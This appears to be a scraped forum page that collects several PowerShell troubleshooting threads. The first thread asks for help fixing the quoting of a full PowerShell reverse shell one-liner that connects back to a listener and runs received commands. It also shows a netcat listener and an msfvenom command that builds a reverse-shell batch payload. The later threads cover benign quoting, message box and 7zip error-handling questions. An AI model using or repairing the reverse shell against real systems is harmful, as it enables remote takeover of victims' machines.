I'm trying to run the below reverse shell PowerShell command using a .bat file.
powershell /w 1 "$c=new-object system.net.sockets.tcpclient('192.168.0.66',4777);$s=$c.GetStream();[byte[]]$b = 0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|out-string);$z=$o + 'hacker> ' + (pwd).Path + '> ';$x = ([text.encoding]::ASCII).GetBytes($z);$s.Write($x,0,$x.Length);$s.Flush};$c.close()"
First, I start the netcat listener in Kali:
nc -vv -l -p 4777
I then run the PowerShell command, but I get the following error in Windows 10:
At line:1 char:112
+ ... 168.0.66',4777);$s=$c.GetStream();[byte[]]$b = 0..65535|:ASCII).GetByte ...
+ ~
Unexpected token ')' in expression or statement.
At line:1 char:160
+ ... 65535|:ASCII).GetBytes($z);$s.Write($x,0,$x.Length);$s.Flush};$c.clos ...
+ ~
Unexpected token '}' in expression or statement.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : UnexpectedToken
I've tried many possible ', " and ``` combinations and variations, both in and encasing the command. I'm totally stumped.
Found myself into the same problem. I wonder why a command that runs without errors in CMD doesn't work well if it's executed inside a .bat file. I doesn't make sense at all.
Metasploit is our friend here:
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat
Source:
https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/
Related
I'm trying to execute in my powershell script the command below :
D:\Apps\Documentum\product\7.3\bin\idql.exe -udmadmin -pPassword dctm04 -RC:\temp\documentum\session_list.txt -w20 > C:\temp\documentum\session_logstash.txt
In my powershell script I do that:
$DOCBASE="dctm04"
$USER_DOCBASE="dmadmin"
$USER_PWD="Password01"
$IDQL_PATH="D:\Apps\Documentum\product\7.3\bin"
$QRY_SESSIONS="C:\temp\documentum\session_list.txt"
$QRY_LOG_SESSIONS="C:\temp\documentum\session_logstash.txt"
$IDQL_PATH\idql.exe -u$USER_DOCBASE -p$USER_PWD $DOCBASE -R$QRY_SESSIONS -w20 > $QRY_LOG_SESSIONS
But it doesn't work properly, I receive the error below :
At C:\temp\documentum\Generate.ps1:49 char:13
+ $IDQL_PATH\idql.exe -u$USER_DOCBASE -p$USER_PWD $DOCBASE -R$QRY_SESSIONS -w20 ...
+ ~~~~~~~~~
Unexpected token '\idql.exe' in expression or statement.
+ CategoryInfo : ParserError: (:) [], ParseException
+ FullyQualifiedErrorId : UnexpectedToken
I think, i don't use variable properly on my command.
Please note my powershell version is :
PS C:\temp\documentum> $PSVersionTable.PSVersion
Major Minor Build Revision
----- ----- ----- --------
4 0 -1 -1
could you give me the solution in order to solve my problem
The reason is that combining a string to executable name makes no sense to Powershell's parsing rules. Use the call operator & or Invoke-Item. Like so,
$ssms="C:\Program Files (x86)\Microsoft SQL Server\140\Tools\Binn\ManagementStudio"
PS C:\> $ssms\ssms.exe
At line:1 char:6
+ $ssms\ssms.exe
+ ~~~~~~~~~
Unexpected token '\ssms.exe' in expression or statement.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : UnexpectedToken
C:\>& $ssms\ssms.exe
# Launches SSMS succesfully
C:\>Invoke-Item $ssms\ssms.exe
# Launches SSMS succesfully
There's nice a document about running executables.
How can I provide arguments to powershell.exe in order to spawn a message box? The key phrase here is arguments to powershell.exe, not from within a .ps1 script and also not from within the Powershell prompt itself. I currently have this but it is producing errors:
powershell.exe -Command "[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms"); [System.Windows.Forms.MessageBox]::Show("Test!!!")"
I have also tried without -Command and with Invoke-Expression, with and without double quotes surrounding.
Errors created:
At line:1 char:51
+ [System.Reflection.Assembly]::LoadWithPartialName(System.Windows.Form ...
+ ~
Missing ')' in method call.
At line:1 char:51
+ ... eflection.Assembly]::LoadWithPartialName(System.Windows.Forms); [Syst ...
+ ~~~~~~~~~~~~~~~~~~~~
Unexpected token 'System.Windows.Forms' in expression or statement.
At line:1 char:71
+ ... flection.Assembly]::LoadWithPartialName(System.Windows.Forms); [Syste ...
+ ~
Unexpected token ')' in expression or statement.
At line:1 char:114
+ ... stem.Windows.Forms); [System.Windows.Forms.MessageBox]::Show(Test!!!)
+ ~
Missing ')' in method call.
At line:1 char:114
+ ... stem.Windows.Forms); [System.Windows.Forms.MessageBox]::Show(Test!!!)
+ ~~~~~~~
Unexpected token 'Test!!!' in expression or statement.
At line:1 char:121
+ ... stem.Windows.Forms); [System.Windows.Forms.MessageBox]::Show(Test!!!)
+ ~
Unexpected token ')' in expression or statement.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : MissingEndParenthesisInMethodCall
This is a quotation problem. Using the same double quote " in both argument and its contents messes up the content. As a work-around, use single quotes within the Powershell command and double quotes around the whole -Command parameter. Like so,
powershell.exe -Command "[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('Test!!!')"
That being said, Add-Type -AssemblyName is IMAO prettier way to load assemblies. Like so,
powershell.exe -Command "add-type -assemblyname System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Test!!!')"
I have a batch file with lot of stuff. I there is one Alert Window with info for user.
On Windows Pro I'm using Msg command for it and it works fine.
On Windows Home there is no Msg, so I got the idea to use PowerShell instead:
[System.Windows.Forms.MessageBox]::Show("my text")
which works fine in PowerShell.
-However, when I try to use it in batch or execute it directly in Cmd, I only get the text:
C:\Windows\System32>powershell {[System.Windows.Forms.MessageBox]::Show("\""my text"\"")}
[System.Windows.Forms.MessageBox]::Show("my text")
Or I get errors:
C:\Windows\System32>powershell -command [System.Windows.Forms.MessageBox]::Show("my text")
At line:1 char:41
+ [System.Windows.Forms.MessageBox]::Show(my text)
+ ~
Missing ')' in method call.
At line:1 char:41
+ [System.Windows.Forms.MessageBox]::Show(my text)
+ ~~
Unexpected token 'my' in expression or statement.
At line:1 char:48
+ [System.Windows.Forms.MessageBox]::Show(my text)
+ ~
Unexpected token ')' in expression or statement.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : MissingEndParenthesisInMethodCall
or
C:\Windows\System32>powershell -command "& {[System.Windows.Forms.MessageBox]::Show('my text')}"
Unable to find type [System.Windows.Forms.MessageBox].
At line:1 char:4
+ & {[System.Windows.Forms.MessageBox]::Show('my text')}
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Windows.Forms.MessageBox:TypeName) [],
RuntimeException
+ FullyQualifiedErrorId : TypeNotFound
What should I do to get it to work?
(without rewriting the whole script to PowerShell, that is)
As TheMadTechnician stated, you may need to load it first.
This is effectively the same answer as theirs just over a couple of lines:
#Echo Off
PowerShell -Command^
"[Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms')|Out-Null;"^
"[System.Windows.Forms.MessageBox]::Show(\"my text\")"
Pause
…and whilst double quotes around my text is not necessary, I've used them to show you the escapes.
You need to load the type before you can invoke it. You can do this:
powershell -command "[reflection.assembly]::LoadWithPartialName('System.Windows.Forms')|out-null;[windows.forms.messagebox]::Show('my message')"
If I running this function (with out try..catch):
executezipFullBackup -PathFileLocation "Z:\" -PathSaveBackup "E:\" -NameOfBackup "MyNASStorage"
PoweShell give me this error:
sz :
At C:\PowerShellF\zipFunction.ps1:6 char:9
+ sz a -t7z "$PathSaveBackup\$NameOfBackup" "$PathFileLocation" #backup
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
ERROR:
Duplicate filename on disk:
BackupTest\private\103.tmp\usr\bin\mail
BackupTest\private\103.tmp\usr\bin\Mail
And that error is OK for me, because I know what is wrong on this step.
But my problem is, if I put this script in try..catch, I dont get this error.
Example:
$ErrorActionPreference = "Stop"; #this is for Try Catch
try {
zipFullBackup -PathFileLocation "$PathFileLocation" -PathSaveBackup "$PathSaveBackup" -NameOfBackup "$NameOfBackup"
} catch {
$MyError = ($Error[0] | Out-String);
Write-Host "$MyError"
}
I get error like this:
sz :
At C:\PowerShellF\zipFunction.ps1:6 char:9
+ sz a -t7z "$PathSaveBackup\$NameOfBackup" "$PathFileLocation" #backup
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
This error is not enough for me, because I don't see ERROR! I don't see this:
ERROR:
Duplicate filename on disk:
BackupTest\private\103.tmp\usr\bin\mail
BackupTest\private\103.tmp\usr\bin\Mail
How can I get try..catch to display this error?
That error message is not part of a PowerShell error/exception, but a message 7zip itself prints to STDOUT. Therefore it can't be caught with a try..catch block, not even if you set $ErrorActionPreference = 'Stop'.
What you can do is collect the command output in a variable, though:
$msg = zipFullBackup ...
The solution for your question is to add the 7zip option -bse1
& cmd.exe /c 'C:\"Program Files"\7-Zip\7z.exe a "c:\DestinationFolder\NameOnZipFiles" c:\FolderToZip\* -bse1
But a better solution for this is to take out the 7zip %errorlevel% from batch, because 7zip is not a PowerShell command.
To do so, use the following code in powershell. Yes the errorlevel variable needs to be written with !errorlevel!
[int]$7zipError=& cmd.exe /v /c 'C:\"Program Files"\7-Zip\7z.exe a -mx0 "c:\DestinationFolder\NameOnZipFiles" c:\FolderToZip\* -bso0 -bsp0 -bse0 &echo:!errorlevel!'
if ($7zipError -gt 0)
{
Write-Host "Errorlevel: $($errorlevel)"
#0 No error
#1 Warning (Non fatal error(s)). For example, one or more files were locked by some other application, so they were not compressed.
#2 Fatal error
#7 Command line error
#8 Not enough memory for operation
#255 User stopped the process
}
If you want to know more and why you need to use “cmd.exe /v” I have written more about this in
PowerShell, only "> $out" catch full error of failed 7Zip extract, why?
The below array containing a lengthy a command line and I have to execute the same
This is the command for verifying SCCM .MIG file using USMTUTIL.EXE
$array = "C:\MININT\amd64\usmtutils /verify:All \\SMB001.India.kerala.net\SMPSTORED_91DAA93F$\2AE09BF0AADC04FC89E0CE8A49E8C904E44C0314A123824A7EB289CAFC258026\USMT\USMT.mig /Decrypt /key:PZSTqMLlsJAYna/ndimPT1SrSAz4JjSNH1P7Sv/8mDj8qmytPcLPE3lYzxHnMiVj/6UkdDcWmiaKqgxHO3yjZj2gu8r/j23oefWOsdyWbo4r3UX2gPvMO38np7OOabZ8B0B6A5mAYynAjfy/1e00uhIm1h6soFUWIuu3wkNevBHxkWQs4xslGlooVOn0f+1kGqe05iRWUaVZC4/yYKv3LdbFLhzRXOxVYjriao4oKCEpNEdjnDK6DRoRRrbDy8Ac > C:\temp\DENDMNPWTST008.log"
I tried Invoke-expression $array
While executing this command, Its separating into different lines and only first line is executing and showing error. But I can copy-paste and run it
Error: CategoryInfo : NotSpecified: (:String) [], RemoteException FullyQualifiedErrorId : NativeCommandError
Invoke-Expression is expecting a string argument and not a string array.
try this:
Invoke-Expression ($array | out-string)